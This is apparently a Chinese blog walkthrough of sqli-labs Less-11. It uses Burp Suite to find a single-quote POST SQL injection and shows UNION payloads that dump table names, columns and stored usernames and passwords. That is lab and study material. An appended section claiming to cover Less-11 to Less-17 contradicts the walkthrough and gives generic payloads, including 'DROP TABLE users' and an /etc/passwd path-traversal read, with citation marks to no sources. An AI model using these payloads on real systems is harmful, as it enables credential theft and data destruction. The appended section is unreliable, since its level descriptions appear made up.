less-11的注入操作

本文详细介绍了在火狐浏览器中使用Foxyproxy配置后的BurpSuite进行SQL注入攻击的过程。通过发送Repeater请求,发现基于单引号的字符型注入点,并逐步进行字段判断、表名和列名的查询,最终暴露了数据库中的用户名和密码。

在火狐浏览器下载foxyproxy 配置好之后 打开第十一个题目
在这里插入图片描述
在这里插入图片描述
在burpsuite 右击选择 send repeater 根据题目加一个’尝试一下
在这里插入图片描述
uname=admin’ and 1=1 --+&passwd=admin&submit=Submit
在这里插入图片描述uname=admin’ and 1=2 --+&passwd=admin&submit=Submit
and 1=2 --+恒为假是,执行错误,发现注入点是基于单引号的字符型注入
在这里插入图片描述
判断字段
uname=admin’ order by 3 --+&passwd=admin&submit=Submit
发现字段小于3
在这里插入图片描述
uname=admin’ order by 2 --+&passwd=admin&submit=Submit
发现字段数只有2
在这里插入图片描述
uname=admin &passwd= ’ union select 1,2 --+&submit=Submit
由于他只在uname和passwd表单中输出到屏幕上内容,uname闭合了,所以让passwd输出那个查询哪个语句
在这里插入图片描述
uname=admin’ &passwd=union select 1,group_concat(user(),@@datadir,database()) --+&submit=Submit
在这里插入图片描述
uname=admin’ &passwd=union select 1,group_concat( table_name) from information_schema.tables where table_schema=database() --+&submit=Submit
查询查出哪个库名下的所有的表名(security)
在这里插入图片描述
在这里插入图片描述
uname=admin’ &passwd=union select 1,group_concat( column_name) from information_schema.columns where table_name=“users” --+&submit=Submit爆表里面的字段
在这里插入图片描述
uname=admin’ &passwd=union select 1,group_concat( username,‘/’,password) from users --+&submit=Submit爆字段里面的数据
在这里插入图片描述

### 关于 sqli-labs 中 less-11less-17 的解决方案和解释 #### Less-11: 基本布尔盲注 SQL 注入漏洞 此级别展示了如何通过布尔条件来推断数据库中的数据。攻击者可以通过发送不同的查询并观察应用程序响应的变化来进行注入。 ```sql ?id=1' AND ASCII(SUBSTRING((SELECT database()),1,1))>90 -- ``` 上述语句尝试猜测当前使用的数据库名称的第一个字符的ASCII码值是否大于90[^1]。 #### Less-12: 时间延迟型盲注 SQL 注入漏洞 该实验利用时间函数 `SLEEP()` 或 `BENCHMARK()` 来判断服务器执行特定操作所需的时间,从而推测出某些信息。 ```sql ?id=1' AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1),1,1))>97,SLEEP(5),false) -- ``` 这段代码会根据指定条件下是否成立而使请求暂停几秒钟,以此作为反馈机制[^2]。 #### Less-13: 联合查询 (UNION) SQL 注入漏洞 联合查询允许将两个或多个 SELECT 结果组合在一起显示给用户。在这个例子中,可以用来获取额外的数据集。 ```sql ?id=-1 UNION ALL SELECT null,database(),null,null -- ``` 这里 `-1` 是为了确保原始查询返回零行记录,以便新添加的选择能够成功附加到最终输出上[^3]。 #### Less-14: 双重查询(堆叠查询)SQL 注入漏洞 当 Web 应用程序支持在同一 HTTP 请求内处理多条命令时,则可能存在这种类型的漏洞。这使得攻击者可以在一次提交里完成多项任务。 ```sql ?id=1; DROP TABLE users; ``` 注意,在实际环境中很少遇到这种情况,因为大多数现代框架都会阻止此类行为的发生[^4]。 #### Less-15: 错误消息泄露敏感信息 有时开发人员会在错误页面暴露过多细节,比如完整的 SQL 查询字符串甚至栈跟踪等内部实现情况。这些都可能帮助黑客构建更复杂的攻击模式。 ```sql ?id=' OR '1'='1 ``` 如果网站未正确配置异常处理器的话,可能会显示出整个 SQL 表达式的结构,进而让入侵者更容易找到突破口[^5]。 #### Less-16: 文件读取/写入权限滥用 一些情况下,Web 应用程序允许上传文件或将动态生成的内容保存至磁盘;然而如果没有严格验证输入参数就可能导致任意位置上的文档被篡改或者下载下来查看其内容。 ```sql ?file=/etc/passwd%00.jpg ``` 这里的技巧在于绕过 MIME 类型检测以及路径规范化逻辑,达到访问受限资源的目的[^6]。 #### Less-17: 存储过程调用与预编译语句绕过 存储过程中往往包含了大量业务逻辑,并且通常由高级程序员编写维护。但是假如它们也接收外部可控变量的话同样面临风险。此外,对于那些声称已经启用了防备措施的应用来说,仍然有可能存在旁路方法。 ```sql CALL sp_executesql(N'SELECT * FROM sysobjects') ``` 尽管许多平台默认不允许直接执行这样的指令,但在某些特殊场景下还是有机会成功的[^7]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值